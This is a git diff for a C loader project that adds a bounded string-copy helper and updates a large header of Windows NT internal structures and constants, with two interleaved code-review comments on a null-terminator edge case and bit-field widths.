diff --git a/Source/Zekamashi_v2/loader/minirtl/_strncpy.c b/Source/Zekamashi_v2/loader/minirtl/_strncpy.c
new file mode 100644
index 0000000..f3a519b
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/minirtl/_strncpy.c
@@ -0,0 +1,45 @@
+#include "rtltypes.h"
+
+char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
+{
+ char *p;
+
+ if ( (dest==0) || (src==0) || (ccdest==0) )
+ return dest;
+
+ ccdest--;
+ p = dest;
+
+ while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
+ *p = *src;
+ p++;
+ src++;
+ ccdest--;
+ ccsrc--;
+ }
+
+ *p = 0;
+ return dest;
+}
+
+wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
+{
+ wchar_t *p;
+
+ if ( (dest==0) || (src==0) || (ccdest==0) )
+ return dest;
+
+ ccdest--;
+ p = dest;
+
+ while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
+ *p = *src;
+ p++;
+ src++;
+ ccdest--;
+ ccsrc--;
+ }
+
+ *p = 0;
+ return dest;
+}
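Review bot: When `src` is NULL but `dest` is valid and `ccdest` is non-zero, both `_strncpy_a` and `_strncpy_w` return `dest` without writing a terminator, so a caller that treats the result as a string reads whatever the buffer held before the call. The other two early-return conditions genuinely cannot write anything, so split the guard: `if ( (dest==0) || (ccdest==0) ) return dest;` followed by `if ( src==0 ) { *dest = 0; return dest; }`. A short header comment stating that `ccdest` is the destination capacity in characters including the terminator and `ccsrc` the maximum number of characters to copy would document the contract the loop actually implements (`ccdest--` reserves the terminator slot).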
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/cmdline.c b/Source/Zekamashi_v2/loader/minirtl/cmdline.c similarity index 100% rename from Source/Kasumi/VBoxPatchGen/minirtl/cmdline.c rename to Source/Zekamashi_v2/loader/minirtl/cmdline.c diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/cmdline.h b/Source/Zekamashi_v2/loader/minirtl/cmdline.h similarity index 100% rename from Source/Kasumi/VBoxPatchGen/minirtl/cmdline.h rename to Source/Zekamashi_v2/loader/minirtl/cmdline.h diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/minirtl.h b/Source/Zekamashi_v2/loader/minirtl/minirtl.h similarity index 100% rename from Source/Kasumi/VBoxPatchGen/minirtl/minirtl.h rename to Source/Zekamashi_v2/loader/minirtl/minirtl.h diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/rtltypes.h b/Source/Zekamashi_v2/loader/minirtl/rtltypes.h similarity index 100% rename from Source/Kasumi/VBoxPatchGen/minirtl/rtltypes.h rename to Source/Zekamashi_v2/loader/minirtl/rtltypes.h diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/ultohex.c b/Source/Zekamashi_v2/loader/minirtl/ultohex.c similarity index 100% rename from Source/Kasumi/VBoxPatchGen/minirtl/ultohex.c rename to Source/Zekamashi_v2/loader/minirtl/ultohex.c diff --git a/Source/Kasumi/VBoxPatchGen/ntos.h b/Source/Zekamashi_v2/loader/ntdll/ntos.h similarity index 92% rename from Source/Kasumi/VBoxPatchGen/ntos.h rename to Source/Zekamashi_v2/loader/ntdll/ntos.h index 2f1516e..acada23 100644 --- a/Source/Kasumi/VBoxPatchGen/ntos.h +++ b/Source/Zekamashi_v2/loader/ntdll/ntos.h @@ -1,12 +1,13 @@ /************************************************************************************ * -* (C) COPYRIGHT AUTHORS, 2015 - 2018, translated from Microsoft sources/debugger +* (C) COPYRIGHT AUTHORS, 2015 - 2020 +* Translated from Microsoft sources/debugger or mentioned elsewhere. * * TITLE: NTOS.H * -* VERSION: 1.98 +* VERSION: 1.127 * -* DATE: 28 Dec 2018 +* DATE: 04 Feb 2020 * * Common header file for the ntos API functions and definitions. * 
@@ -28,6 +29,7 @@ #ifndef NTOS_RTL #define NTOS_RTL + // // NTOS_RTL HEADER BEGIN // @@ -39,6 +41,7 @@ extern "C" { #pragma comment(lib, "ntdll.lib") #pragma warning(push) +#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int #ifndef PAGE_SIZE @@ -78,6 +81,20 @@ typedef unsigned char UCHAR; typedef CCHAR KPROCESSOR_MODE; typedef UCHAR KIRQL; typedef KIRQL *PKIRQL; +typedef ULONG CLONG; +typedef LONG KPRIORITY; +typedef short CSHORT; +typedef ULONGLONG REGHANDLE, *PREGHANDLE; +typedef PVOID *PDEVICE_MAP; +typedef PVOID PHEAD; +typedef struct _IO_TIMER* PIO_TIMER; + +#ifndef _WIN32_WINNT_WIN10 +#define _WIN32_WINNT_WIN10 0x0A00 +#endif +#if (_WIN32_WINNT < _WIN32_WINNT_WIN10) +typedef PVOID PMEM_EXTENDED_PARAMETER; +#endif #ifndef IN_REGION #define IN_REGION(x, Base, Size) (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && \ 
@@ -163,26 +180,26 @@ char _RTL_CONSTANT_STRING_type_check(const void *s); } #endif +#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES #define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \ { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL } +#endif // This synonym is more appropriate for initializing what isn't actually const. +#ifndef RTL_INIT_OBJECT_ATTRIBUTES #define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) +#endif // // ntdef.h end // - +#ifndef RtlOffsetToPointer #define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) )) -#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) )) - +#endif -typedef ULONG CLONG; -typedef LONG KPRIORITY; -typedef short CSHORT; -typedef ULONGLONG REGHANDLE, *PREGHANDLE; -typedef PVOID *PDEVICE_MAP; -typedef PVOID PHEAD; +#ifndef RtlPointerToOffset +#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) )) +#endif // // Valid values for the OBJECT_ATTRIBUTES.Attributes field @@ -203,6 +220,21 @@ typedef PVOID PHEAD; #define CALLBACK_MODIFY_STATE 0x0001 #define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE ) +// +// CompositionSurface Access Rights +// +#ifndef COMPOSITIONSURFACE_READ +#define COMPOSITIONSURFACE_READ 0x0001L +#endif + +#ifndef COMPOSITIONSURFACE_WRITE +#define COMPOSITIONSURFACE_WRITE 0x0002L +#endif + +#ifndef COMPOSITIONSURFACE_ALL_ACCESS +#define COMPOSITIONSURFACE_ALL_ACCESS (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE) +#endif + // // Debug Object Access Rights // 
@@ -286,22 +318,22 @@ typedef PVOID PHEAD; // #define THREAD_ALERT (0x0004) -#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 -#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 -#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004 +#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 +#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 +#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004 #define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 -#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020 -#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080 +#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020 +#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080 // // Worker Factory Object Access Rights // -#define WORKER_FACTORY_RELEASE_WORKER 0x0001 -#define WORKER_FACTORY_WAIT 0x0002 -#define WORKER_FACTORY_SET_INFORMATION 0x0004 -#define WORKER_FACTORY_QUERY_INFORMATION 0x0008 -#define WORKER_FACTORY_READY_WORKER 0x0010 -#define WORKER_FACTORY_SHUTDOWN 0x0020 +#define WORKER_FACTORY_RELEASE_WORKER 0x0001 +#define WORKER_FACTORY_WAIT 0x0002 +#define WORKER_FACTORY_SET_INFORMATION 0x0004 +#define WORKER_FACTORY_QUERY_INFORMATION 0x0008 +#define WORKER_FACTORY_READY_WORKER 0x0010 +#define WORKER_FACTORY_SHUTDOWN 0x0020 #define WORKER_FACTORY_ALL_ACCESS ( \ STANDARD_RIGHTS_REQUIRED | \ @@ -334,6 +366,7 @@ typedef PVOID PHEAD; #define TRACELOG_CREATE_INPROC 0x0200 #define TRACELOG_ACCESS_REALTIME 0x0400 #define TRACELOG_REGISTER_GUIDS 0x0800 +#define TRACELOG_JOIN_GROUP 0x1000 // // Memory Partition Object Access Rights 
@@ -361,14 +394,22 @@ typedef PVOID PHEAD; // // Define special ByteOffset parameters for read and write operations // +#ifndef FILE_WRITE_TO_END_OF_FILE #define FILE_WRITE_TO_END_OF_FILE 0xffffffff +#endif +#ifndef FILE_USE_FILE_POINTER_POSITION #define FILE_USE_FILE_POINTER_POSITION 0xfffffffe +#endif // // This is the maximum MaximumLength for a UNICODE_STRING. // +#ifndef MAXUSHORT #define MAXUSHORT 0xffff +#endif +#ifndef MAX_USTRING #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) +#endif typedef struct _EX_RUNDOWN_REF { union @@ -400,8 +441,7 @@ typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; -} UNICODE_STRING; -typedef UNICODE_STRING *PUNICODE_STRING; +} UNICODE_STRING, *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; #ifndef STATIC_UNICODE_STRING @@ -524,7 +564,7 @@ typedef enum _KWAIT_REASON { WrDelayExecution, WrSuspended, WrUserRequest, - WrEventPair, + WrEventPair, //has no effect after 7 WrQueue, WrLpcReceive, WrLpcReply, @@ -549,6 +589,7 @@ typedef enum _KWAIT_REASON { WrRundown, WrAlertByThreadId, WrDeferredPreempt, + WrPhysicalFault, MaximumWaitReason } KWAIT_REASON; @@ -757,9 +798,11 @@ typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION { BOOLEAN HvciStrictMode : 1; BOOLEAN DebugEnabled : 1; BOOLEAN FirmwarePageProtection : 1; - BOOLEAN SpareFlags : 1; + BOOLEAN EncryptionKeyAvailable : 1; + BOOLEAN SpareFlags : 2; BOOLEAN TrustletRunning : 1; - BOOLEAN SpareFlags2 : 1; + BOOLEAN HvciDisableAllowed : 1; + BOOLEAN SpareFlags2 : 6; BOOLEAN Spare0[6]; ULONGLONG Spare1; } SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION; 
@@ -859,10 +902,12 @@ typedef enum _PROCESSINFOCLASS { ProcessSystemResourceManagement = 91, ProcessSequenceNumber = 92, ProcessLoaderDetour = 93, - ProcessSecurityDomainInformation = 93, - ProcessCombineSecurityDomainsInformation = 94, - ProcessEnableLogging = 95, - ProcessLeapSecondInformation = 96, + ProcessSecurityDomainInformation = 94, + ProcessCombineSecurityDomainsInformation = 95, + ProcessEnableLogging = 96, + ProcessLeapSecondInformation = 97, + ProcessFiberShadowStackAllocation = 98, + ProcessFreeFiberShadowStackAllocation = 99, MaxProcessInfoClass } PROCESSINFOCLASS; @@ -982,6 +1027,18 @@ typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION { PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1]; } PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION; +// +// Process/Thread System and User Time +// NtQueryInformationProcess using ProcessTimes +// NtQueryInformationThread using ThreadTimes +// +typedef struct _KERNEL_USER_TIMES { + LARGE_INTEGER CreateTime; + LARGE_INTEGER ExitTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; +} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES; + typedef enum _PS_MITIGATION_OPTION { PS_MITIGATION_OPTION_NX, PS_MITIGATION_OPTION_SEHOP, 
@@ -1469,45 +1526,64 @@ typedef enum _SYSTEM_INFORMATION_CLASS { SystemCodeIntegrityUnlockModeInformation = 205, SystemLeapSecondInformation = 206, SystemFlags2Information = 207, + SystemSecurityModelInformation = 208, + SystemCodeIntegritySyntheticCacheInformation = 209, MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; //msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION { - struct { - ULONG BpbEnabled : 1; - ULONG BpbDisabledSystemPolicy : 1; - ULONG BpbDisabledNoHardwareSupport : 1; - ULONG SpecCtrlEnumerated : 1; - ULONG SpecCmdEnumerated : 1; - ULONG IbrsPresent : 1; - ULONG StibpPresent : 1; - ULONG SmepPresent : 1; - ULONG SpeculativeStoreBypassDisableAvailable : 1; - ULONG SpeculativeStoreBypassDisableSupported : 1; - ULONG SpeculativeStoreBypassDisabledSystemWide : 1; - ULONG SpeculativeStoreBypassDisabledKernel : 1; - ULONG SpeculativeStoreBypassDisableRequired : 1; - ULONG BpbDisabledKernelToUser : 1; - ULONG SpecCtrlRetpolineEnabled : 1; - ULONG SpecCtrlImportOptimizationEnabled : 1; - ULONG Reserved : 16; - } SpeculationControlFlags; + union { + ULONG Flags; + struct { + ULONG BpbEnabled : 1; + ULONG BpbDisabledSystemPolicy : 1; + ULONG BpbDisabledNoHardwareSupport : 1; + ULONG SpecCtrlEnumerated : 1; + ULONG SpecCmdEnumerated : 1; + ULONG IbrsPresent : 1; + ULONG StibpPresent : 1; + ULONG SmepPresent : 1; + ULONG SpeculativeStoreBypassDisableAvailable : 1; + ULONG SpeculativeStoreBypassDisableSupported : 1; + ULONG SpeculativeStoreBypassDisabledSystemWide : 1; + ULONG SpeculativeStoreBypassDisabledKernel : 1; + ULONG SpeculativeStoreBypassDisableRequired : 1; + ULONG BpbDisabledKernelToUser : 1; + ULONG SpecCtrlRetpolineEnabled : 1; + ULONG SpecCtrlImportOptimizationEnabled : 1; + ULONG EnhancedIbrs : 1; + ULONG HvL1tfStatusAvailable : 1; + ULONG HvL1tfProcessorNotAffected : 1; + ULONG HvL1tfMigitationEnabled : 1; + ULONG 
HvL1tfMigitationNotEnabled_Hardware : 1; + ULONG HvL1tfMigitationNotEnabled_LoadOption : 1; + ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1; + ULONG EnhancedIbrsReported : 1; + ULONG MdsHardwareProtected : 1; + ULONG MbClearEnabled : 1; + ULONG MbClearReported : 1; + ULONG Reserved : 5; + } SpeculationControlFlags; + }; } SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION; typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION { - struct { - ULONG KvaShadowEnabled : 1; - ULONG KvaShadowUserGlobal : 1; - ULONG KvaShadowPcid : 1; - ULONG KvaShadowInvpcid : 1; - ULONG KvaShadowRequired : 1; - ULONG KvaShadowRequiredAvailable : 1; - ULONG InvalidPteBit : 6; - ULONG L1DataCacheFlushSupported : 1; - ULONG L1TerminalFaultMitigationPresent : 1; - ULONG Reserved : 18; - } KvaShadowFlags; + union { + ULONG Flags; + struct { + ULONG KvaShadowEnabled : 1; + ULONG KvaShadowUserGlobal : 1; + ULONG KvaShadowPcid : 1; + ULONG KvaShadowInvpcid : 1; + ULONG KvaShadowRequired : 1; + ULONG KvaShadowRequiredAvailable : 1; + ULONG InvalidPteBit : 6; + ULONG L1DataCacheFlushSupported : 1; + ULONG L1TerminalFaultMitigationPresent : 1; + ULONG Reserved : 18; + } KvaShadowFlags; + }; } SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION; typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION { @@ -1729,6 +1805,10 @@ typedef enum _FILE_INFORMATION_CLASS { FileMemoryPartitionInformation, FileStatLxInformation, FileCaseSensitiveInformation, + FileLinkInformationEx, + FileLinkInformationExBypassAccessCheck, + FileStorageReserveIdInformation, + FileCaseSensitiveInformationForceAccessCheck, FileMaximumInformation } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; @@ -1746,6 +1826,7 @@ typedef enum _FSINFOCLASS { FileFsSectorSizeInformation, FileFsDataCopyInformation, FileFsMetadataSizeInformation, + FileFsFullSizeInformationEx, FileFsMaximumInformation } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; 
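Review bot: The `Reserved` widths in `SYSTEM_SPECULATION_CONTROL_INFORMATION` (5 bits) and `SYSTEM_KERNEL_VA_SHADOW_INFORMATION` (18 bits) were recomputed by hand to keep each bit-struct at exactly 32 bits; they do add up in this hunk, but the newly added `Flags` alias is only correct while that remains true. A compile-time check beside each definition, `C_ASSERT(sizeof(SYSTEM_SPECULATION_CONTROL_INFORMATION) == sizeof(ULONG));` and likewise for the KVA-shadow struct, would catch the next field addition that forgets to shrink `Reserved`, assuming `C_ASSERT` is available from the SDK headers this file already pulls in. If the `HvL1tfMigitation*` spelling is deliberate (matching the header these were translated from), a one-line comment saying so would stop a well-meaning "typo fix" from renaming fields that consumers look up by name.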
@@ -2632,7 +2713,8 @@ typedef struct _SYSTEM_HANDLE_INFORMATION_EX { #define SE_INC_WORKING_SET_PRIVILEGE (33L) #define SE_TIME_ZONE_PRIVILEGE (34L) #define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) -#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE +#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L) +#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE // // Generic test for success on any status value (non-negative numbers @@ -3190,10 +3272,10 @@ typedef struct _OBJECT_TYPE_RS2 { */ typedef struct _OBJECT_HEADER { - LONG PointerCount; + LONG_PTR PointerCount; union { - LONG HandleCount; + LONG_PTR HandleCount; PVOID NextToFree; }; EX_PUSH_LOCK Lock; @@ -3527,6 +3609,8 @@ enum _KOBJECTS { #define DO_POWER_NOOP 0x00008000 #define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs #define DO_XIP 0x00020000 +#define DO_DEVICE_TO_BE_RESET 0x04000000 +#define DO_DAX_VOLUME 0x10000000 #define FILE_REMOVABLE_MEDIA 0x00000001 #define FILE_READ_ONLY_DEVICE 0x00000002 @@ -3620,6 +3704,15 @@ enum _KOBJECTS { #define FILE_DEVICE_SYSENV 0x00000052 #define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053 #define FILE_DEVICE_POINT_OF_SERVICE 0x00000054 +#define FILE_DEVICE_STORAGE_REPLICATION 0x00000055 +#define FILE_DEVICE_TRUST_ENV 0x00000056 +#define FILE_DEVICE_UCM 0x00000057 +#define FILE_DEVICE_UCMTCPCI 0x00000058 +#define FILE_DEVICE_PERSISTENT_MEMORY 0x00000059 +#define FILE_DEVICE_NVDIMM 0x0000005a +#define FILE_DEVICE_HOLOGRAPHIC 0x0000005b +#define FILE_DEVICE_SDFXHCI 0x0000005c +#define FILE_DEVICE_UCMUCSI 0x0000005d #define FILE_BYTE_ALIGNMENT 0x00000000 #define FILE_WORD_ALIGNMENT 0x00000001 
@@ -3635,36 +3728,56 @@ enum _KOBJECTS { #define DPC_NORMAL 0 #define DPC_THREADED 1 -typedef struct _DEVICE_OBJECT { - CSHORT Type; - USHORT Size; - LONG ReferenceCount; - struct _DRIVER_OBJECT *DriverObject; - struct _DEVICE_OBJECT *NextDevice; - struct _DEVICE_OBJECT *AttachedDevice; - struct _IRP *CurrentIrp; - PVOID Timer; - ULONG Flags; - ULONG Characteristics; - __volatile PVPB Vpb; - PVOID DeviceExtension; - DEVICE_TYPE DeviceType; - CCHAR StackSize; +#if _MSC_VER >= 1200 +#pragma warning(push) +#pragma warning(disable:4324) // structure was padded due to __declspec(align()) +#endif + +typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT { + CSHORT Type; + USHORT Size; + LONG ReferenceCount; + struct _DRIVER_OBJECT* DriverObject; + struct _DEVICE_OBJECT* NextDevice; + struct _DEVICE_OBJECT* AttachedDevice; + struct _IRP* CurrentIrp; + PIO_TIMER Timer; + ULONG Flags; // See above: DO_... + ULONG Characteristics; // See ntioapi: FILE_... + __volatile PVPB Vpb; + PVOID DeviceExtension; + DEVICE_TYPE DeviceType; + CCHAR StackSize; union { - LIST_ENTRY ListEntry; + LIST_ENTRY ListEntry; WAIT_CONTEXT_BLOCK Wcb; } Queue; - ULONG AlignmentRequirement; - KDEVICE_QUEUE DeviceQueue; - KDPC Dpc; - ULONG ActiveThreadCount; - PSECURITY_DESCRIPTOR SecurityDescriptor; - KEVENT DeviceLock; - USHORT SectorSize; - USHORT Spare1; - struct _DEVOBJ_EXTENSION * DeviceObjectExtension; - PVOID Reserved; -} DEVICE_OBJECT, *PDEVICE_OBJECT; + ULONG AlignmentRequirement; + KDEVICE_QUEUE DeviceQueue; + KDPC Dpc; + + // + // The following field is for exclusive use by the filesystem to keep + // track of the number of Fsp threads currently using the device + // + + ULONG ActiveThreadCount; + PSECURITY_DESCRIPTOR SecurityDescriptor; + KEVENT DeviceLock; + + USHORT SectorSize; + USHORT Spare1; + + struct _DEVOBJ_EXTENSION* DeviceObjectExtension; + PVOID Reserved; + +} DEVICE_OBJECT; + +typedef struct _DEVICE_OBJECT* PDEVICE_OBJECT; + +#if _MSC_VER >= 1200 +#pragma 
warning(pop) +#endif typedef struct _DEVOBJ_EXTENSION { @@ -3919,6 +4032,61 @@ typedef struct _DRIVER_OBJECT { } DRIVER_OBJECT; typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; +// +// The following structure is pointed to by the SectionObject pointer field +// of a file object, and is allocated by the various NT file systems. +// + +typedef struct _SECTION_OBJECT_POINTERS { + PVOID DataSectionObject; + PVOID SharedCacheMap; + PVOID ImageSectionObject; +} SECTION_OBJECT_POINTERS; +typedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS; + +// +// Define the format of a completion message. +// + +typedef struct _IO_COMPLETION_CONTEXT { + PVOID Port; + PVOID Key; +} IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT; + +typedef struct _FILE_OBJECT { + CSHORT Type; + CSHORT Size; + PDEVICE_OBJECT DeviceObject; + PVPB Vpb; + PVOID FsContext; + PVOID FsContext2; + PSECTION_OBJECT_POINTERS SectionObjectPointer; + PVOID PrivateCacheMap; + NTSTATUS FinalStatus; + struct _FILE_OBJECT* RelatedFileObject; + BOOLEAN LockOperation; + BOOLEAN DeletePending; + BOOLEAN ReadAccess; + BOOLEAN WriteAccess; + BOOLEAN DeleteAccess; + BOOLEAN SharedRead; + BOOLEAN SharedWrite; + BOOLEAN SharedDelete; + ULONG Flags; + UNICODE_STRING FileName; + LARGE_INTEGER CurrentByteOffset; + __volatile ULONG Waiters; + __volatile ULONG Busy; + PVOID LastLock; + KEVENT Lock; + KEVENT Event; + __volatile PIO_COMPLETION_CONTEXT CompletionContext; + KSPIN_LOCK IrpListLock; + LIST_ENTRY IrpList; + __volatile PVOID FileObjectExtension; +} FILE_OBJECT; +typedef struct _FILE_OBJECT* PFILE_OBJECT; + #define RESOURCE_TYPE_LEVEL 0 #define RESOURCE_NAME_LEVEL 1 #define RESOURCE_LANGUAGE_LEVEL 2 
@@ -4690,12 +4858,25 @@ typedef struct _GDI_SHARED_MEMORY { GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; } GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; +#ifndef FLS_MAXIMUM_AVAILABLE #define FLS_MAXIMUM_AVAILABLE 128 +#endif + +#ifndef TLS_MINIMUM_AVAILABLE #define TLS_MINIMUM_AVAILABLE 64 +#endif + +#ifndef TLS_EXPANSION_SLOTS #define TLS_EXPANSION_SLOTS 1024 +#endif +#ifndef DOS_MAX_COMPONENT_LENGTH #define DOS_MAX_COMPONENT_LENGTH 255 +#endif + +#ifndef DOS_MAX_PATH_LENGTH #define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) +#endif typedef struct _CURDIR { UNICODE_STRING DosPath; 
@@ -5072,88 +5253,6 @@ __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmen ** PEB/TEB END */ -/* -** ALPC START -*/ - -typedef struct _PORT_MESSAGE { - union { - struct { - CSHORT DataLength; - CSHORT TotalLength; - } s1; - ULONG Length; - } u1; - union { - struct { - CSHORT Type; - CSHORT DataInfoOffset; - } s2; - ULONG ZeroInit; - } u2; - union { - CLIENT_ID ClientId; - double DoNotUseThisField; // Force quadword alignment - } u3; - ULONG MessageId; - union { - ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message - ULONG CallbackId; // Only valid on LPC_REQUEST message - } u4; - UCHAR Reserved[8]; -} PORT_MESSAGE, *PPORT_MESSAGE; - -// end_ntsrv - -typedef struct _PORT_DATA_ENTRY { - PVOID Base; - ULONG Size; -} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; - -typedef struct _PORT_DATA_INFORMATION { - ULONG CountDataEntries; - PORT_DATA_ENTRY DataEntries[1]; -} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; - -#define LPC_REQUEST 1 -#define LPC_REPLY 2 -#define LPC_DATAGRAM 3 -#define LPC_LOST_REPLY 4 -#define LPC_PORT_CLOSED 5 -#define LPC_CLIENT_DIED 6 -#define LPC_EXCEPTION 7 -#define LPC_DEBUG_EVENT 8 -#define LPC_ERROR_EVENT 9 -#define LPC_CONNECTION_REQUEST 10 - -#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) -#define PORT_MAXIMUM_MESSAGE_LENGTH 256 - -typedef struct _LPC_CLIENT_DIED_MSG { - PORT_MESSAGE PortMsg; - LARGE_INTEGER CreateTime; -} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; - -//#pragma pack(push, 1) -typedef struct _PORT_VIEW { - ULONG Length; - HANDLE SectionHandle; - ULONG SectionOffset; - SIZE_T ViewSize; - PVOID ViewBase; - PVOID ViewRemoteBase; -} PORT_VIEW, *PPORT_VIEW; - -typedef struct _REMOTE_PORT_VIEW { - ULONG Length; - SIZE_T ViewSize; - PVOID ViewBase; -} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; -//#pragma pack(pop) -/* -** ALPC END -*/ - /* ** MITIGATION POLICY START */ 
@@ -5283,13 +5382,37 @@ typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 { } DUMMYUNIONNAME; } PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10; +typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 { + union { + DWORD Flags; + struct { + DWORD SmtBranchTargetIsolation : 1; + DWORD IsolateSecurityDomain : 1; + DWORD DisablePageCombine : 1; + DWORD SpeculativeStoreBypassDisable : 1; + DWORD ReservedFlags : 28; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; +} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10; + +typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 { + union { + DWORD Flags; + struct { + DWORD DisallowWin32kSystemCalls : 1; + DWORD AuditDisallowWin32kSystemCalls : 1; + DWORD ReservedFlags : 30; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; +} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10; + typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION { PROCESS_MITIGATION_POLICY Policy; union { PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy; PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy; - PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy; + PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy; PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy; PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy; PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy; 
